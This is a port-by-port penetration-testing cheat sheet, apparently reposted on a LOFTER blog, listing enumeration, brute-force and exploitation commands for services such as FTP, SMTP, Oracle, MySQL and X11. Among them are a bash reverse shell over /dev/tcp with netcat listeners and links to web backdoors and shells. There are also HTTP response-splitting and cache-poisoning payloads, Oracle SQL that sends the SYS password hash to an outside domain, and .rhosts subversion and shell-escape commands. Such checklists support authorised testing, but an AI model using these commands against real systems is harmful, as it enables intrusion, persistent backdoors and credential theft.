内容中有些超链接,需自备梯子
FTP port 21 open
Fingerprint server
telnet ip_address 21 (Banner grab)
Run command ftp ip_address
ftp@example.com
Check for anonymous access
ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
Password guessing
Examine configuration files
ftpusers
ftp.conf
proftpd.conf
MiTM
SSH port 22 open
Fingerprint server
telnet ip_address 22 (banner grab)
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
Password guessing
ssh root@ip_address
./b -l username -h ip_address -p 22 -2 < password_file_location
Examine configuration files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
SSH Client programs
Telnet port 23 open
Fingerprint server
telnet ip_address
Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
Password Attack
telnet -l "-froot" hostname (Solaris 10+)
Examine configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
Sendmail Port 25 open
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
DNS port 53 open
Fingerprint server/ service
host
host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
nslookup
nslookup [ -option ... ] [ host-to-find | - [ server ]]
dig
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
DNS Enumeration
perl BiLE.pl [website] [project_name]
perl BiLE-weigh.pl [website] [input file]
perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
perl vet-mx.pl [input file] [true domain file] [output file]
perl exp-tld.pl [input file] [output file]
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
perl qtrace.pl [ip_address_file] [output_file]
perl jarf-rev [subnetblock] [nameserver]
txdns -rt -t domain_name
txdns -x 50 -bb domain_name
txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
Examine Configuration Files
host.conf
resolv.conf
named.conf
TFTP port 69 open
TFTP Enumeration
tftp ip_address PUT local_file
tftp ip_address GET conf.txt (or other files)
Solarwinds TFTP server
tftp – i <IP> GET /etc/passwd (old Solaris)
TFTP Bruteforcing
Finger Port 79 open
User enumeration
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
Command execution
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim
finger @internal@external
Web Ports 80, 8080 etc. open
Fingerprint server
Telnet ip_address port
Firefox plugins
Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
nikto [-h target] [options]
Vulnerability Assessment
Manual Tests
Install Backdoors
ASP
https://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
Assorted
https://michaeldaw.org/projects/web-backdoor-compilation/
https://open-labs.org/hacker_webkit02.tar.gz
Perl
https://home.arcor.de/mschierlm/test/pmsh.pl
https://pentestmonkey.net/tools/perl-reverse-shell/
https://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
PHP
https://php.spb.ru/remview/
https://pentestmonkey.net/tools/php-reverse-shell/
https://pentestmonkey.net/tools/php-findsock-shell/
Python
https://matahari.sourceforge.net/
TCL
https://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
Bash Connect Back Shell
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Adress Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT https://Target_URL/FILE_NAME
POST https://Target_URL/FILE_NAME HTTP/1.x
Upload Files
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
– , = , + , "
Used to craft SQL Injection queries.
‘ , &, ! , ¦ , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
./orderby.py www.site.com/index.php?id=
./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--
Vulnerability Scanners
Specific Applications/ Server Tools
Domino
dominoaudit.pl [options] -h <IP>
Joomla
./cms.py <site-name>
./joomsq.py <IP>
./joomlascan.py <site> <options> [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don't show 404 responses]
./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
jscan.pl -f hostname
(shell.txt required)
asp-audit.pl https://target/app/filename.aspx (options i.e. -bf)
Vbulletin
vbscan.py <host> <port> -v
vbscan.py -update
ZyXel
snmpwalk
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
snmpget
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
Proxy Testing
Examine configuration files
Generic
Examine httpd.conf/ windows config files
JMX Console https://<IP>:8080/jmxconcole/
Joomla
configuration.php
diagnostics.php
joomla.inc.php
config.inc.php
Mambo
configuration.php
config.inc.php
Wordpress
setup-config.php
wp-config.php
/WAN.html (contains PPPoE ISP password)
/WLAN_General.html and /WLAN.html (contains WEP key)
/rpDyDNS.html (contains DDNS credentials)
/Firewall_DefPolicy.html (Firewall)
/CF_Keyword.html (Content Filter)
/RemMagWWW.html (Remote MGMT)
/rpSysAdmin.html (System)
/LAN_IP.html (LAN)
/NAT_General.html (NAT)
/ViewLog.html (Logs)
/rpFWUpload.html (Tools)
/DiagGeneral.html (Diagnostic)
/RemMagSNMP.html (SNMP Passwords)
/LAN_ClientList.html (Current DHCP Leases)
Config Backups
/RestoreCfg.html
/BackupCfg.html
Note: - The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
Examine web server logs
c:\winnt\system32\Logfiles\W3SVC1
awk -F " " '{print $3,$11} filename | sort | uniq
References
Exploit Frameworks
Brute-force Tools
Portmapper port 111 open
rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
rpcinfo
rpcinfo [options] IP_Address
NTP Port 123 open
NTP Enumeration
ntpdc -c monlist IP_ADDRESS
ntpdc -c sysinfo IP_ADDRESS
ntpq
host
hostname
ntpversion
readlist
version
Examine configuration files
ntp.conf
NetBIOS Ports 135-139,445 open
NetBIOS enumeration
enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
Null Session
net use \\192.168.1.1\ipc$ "" /u:""
net view \\ip_address
Smbclient
smbclient -L //server/share password options
Enumeration tab.
NetBIOS brute force
Examine Configuration Files
Smb.conf
lmhosts
SNMP port 161 open
Default Community Strings
public
private
cisco
cable-docsis
ILMI
MIB enumeration
Windows NT
.1.3.6.1.2.1.1.5 Hostnames
.1.3.6.1.4.1.77.1.4.2 Domain Name
.1.3.6.1.4.1.77.1.2.25 Usernames
.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
.1.3.6.1.4.1.77.1.2.27 Share Information
snmpwalk
snmpwalk -v <Version> -c <Community string> <IP>
Applications
ZyXel
snmpget -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2.6.0
snmpwalk -v2c -c <Community String> <IP> 1.3.6.1.4.1.890.1.2.1.2
SNMP Bruteforce
onesixtyone
onesixytone -c SNMP.wordlist <IP>
cat
./cat -h <IP> -w SNMP.wordlist
Examine SNMP Configuration files
snmp.conf
snmpd.conf
snmp-config.xml
LDAP Port 389 Open
ldap enumeration
ldapminer -h ip_address -p port (not required if default) -d
Gui based tool
Gui based tool
ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
ldap brute force
bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
Examine Configuration Files
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
PPTP/L2TP/VPN port 500/1723 open
Enumeration
Brute-Force
Reference Material
Modbus port 502 open
rlogin port 513 open
Rlogin Enumeration
Find the files
find / -name .rhosts
locate .rhosts
Examine Files
cat .rhosts
Manual Login
rlogin hostname -l username
rlogin <IP>
Subvert the files
echo ++ > .rhosts
Rlogin Brute force
rsh port 514 open
SQL Server Port 1433 1434 open
Citrix port 1494 open
Citrix Enumeration
Default Domain
Published Applications
Citrix Brute Force
Oracle Port 1521 Open
Oracle Enumeration
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
SQL> select utl_http.request('https://gladius:5500/'||(SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')) from dual;
tnsver host [port]
Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
perl tnscmd.pl -h ip_address
perl tnscmd.pl version -h ip_address
perl tnscmd.pl status -h ip_address
perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
sh opwg.sh -s ip_address
opwg.bat -s ip_address
sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
sh oscanner.sh -s ip_address
oscanner.exe -s ip_address
sh reportviewer.sh oscanner_saved_file.xml
reportviewer.exe oscanner_saved_file.xml
Service-register.exe ip_address
Oracle Brute Force
ora-getsid hostname port sid_dictionary_list
ora-auth-alter-session host port sid username password sql
ora-brutesid host port start
ora-pwdbrute host port sid username password-file
ora-userenum host port sid userlistfile
ora-ver -e (-f -l -a) host port
breakable (Targets Application Server Port)
breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
SQLInjector (Targets Application Server Port)
sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
orabf [hash]:[username] [options]
Cracker
Client
Crypto
Manual sql input of previously reported vulnerabilties
Oracle Reference Material
SQL Cheatsheets
https://ha.ckers.org/sqlinjection
https://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
https://www.0x000000.com/?i=14
https://pentestmonkey.net/
NFS Port 2049 open
NFS Enumeration
showmount -e hostname/ip_address
mount -t nfs ip_address:/directory_found_exported /local_mount_point
NFS Brute Force
Interact with NFS share and try to add/delete
Examine Configuration Files
/etc/exports
/etc/lib/nfs/xtab
Compaq/HP Insight Manager Port 2301,2381open
HP Enumeration
Authentication Method
Host OS Authentication
Default Authentication
HP Bruteforce
Examine Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
MySQL port 3306 open
Enumeration
nmap -A -n -p3306 <IP Address>
nmap -A -n -PN --script:ALL -p3306 <IP Address>
telnet IP_Address 3306
use test; select * from test;
To check for other DB's -- show databases
Administration
mysqlshow
mysqlbinlog
Manual Checks
Default usernames and passwords
username: root password:
testing
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
mysql -h <Hostname>
mysql -h <Hostname> -u ""@localhost
Configuration Files
Operating System
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
<InstDir>/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
To run many sql commands at once -- mysql -u username -p < manycommands.sql
MySQL data directory (Location specified in my.cnf)
Parent dir = data directory
mysql
test
information_schema (Key information in MySQL)
Complete table list -- select table_schema,table_name from tables;
Exact privileges -- select grantee, table_schema, privilege_type FROM schema_privileges;
File privileges -- select user,file_priv from mysql.user where user='root';
Version -- select version();
Load a specific file -- SELECT LOAD_FILE('FILENAME');
SSL Check
mysql> show variables like 'have_openssl';
If there's no rows returned at all it means the the distro itself doesn't support SSL connections and probably needs to be recompiled. If its disabled it means that the service just wasn't started with ssl and can be easily fixed.
Privilege Escalation
Current Level of access
mysql>select user();
mysql>select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
mysql> use mysql
mysql> select user,password from user;
Create a new user and grant him privileges
mysql>create user test identified by 'test';
mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
mysql> \! cat /etc/passwd
mysql> \! bash
SQL injection
mysql-miner.pl https://target/ expected_string database
https://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
https://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
References.
Design Weaknesses
MySQL running as root
Exposed publicly on Internet
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
https://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
RDesktop port 3389 open
Sybase Port 5000+ open
Sybase Enumeration
sybase-version ip_address from NGS
Sybase Vulnerability Assessment
Copy output into excel spreadsheet
Evaluate mis-configured parameters
Manual sql input of previously reported vulnerabilties
SIP Port 5060 open
SIP Enumeration
nc IP_Address Port
python sipflanker.py 192.168.1-254
smap
smap IP_Address/Subnet_Mask
smap -o IP_Address/Subnet_Mask
smap -l IP_Address
SIP Packet Crafting etc.
SIP Vulnerability Scanning/ Brute Force
./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
Examine Configuration Files
SIPDefault.cnf
asterisk.conf
sip.conf
phone.conf
sip_notify.conf
<Ethernet address>.cfg
000000000000.cfg
phone1.cfg
sip.cfg etc. etc.
VNC port 5900^ open
VNC Enumeration
Scans
5900^ for direct access.5800 for HTTP access.
VNC Brute Force
Exmine Configuration Files
.vnc
/etc/vnc/config
$HOME/.vnc/config
/etc/sysconfig/vncservers
/etc/vnc.conf
X11 port 6000^ open
X11 Enumeration
List open windows
Authentication Method
Xauth
Xhost
X11 Exploitation
xwd
xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
Keystrokes
Received
Transmitted
Screenshots
xhost +
Examine Configuration Files
/etc/Xn.hosts
/usr/lib/X11/xdm
Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"
/usr/lib/X11/xdm/xsession
/usr/lib/X11/xdm/xsession-remote
/usr/lib/X11/xdm/xsession.0
/usr/lib/X11/xdm/xdm-config
DisplayManager*authorize:on
Tor Port 9001, 9030 open
Tor Node Checker
nmap NSE script
Jet Direct 9100 open
© 走过岁月...... | Powered by LOFTER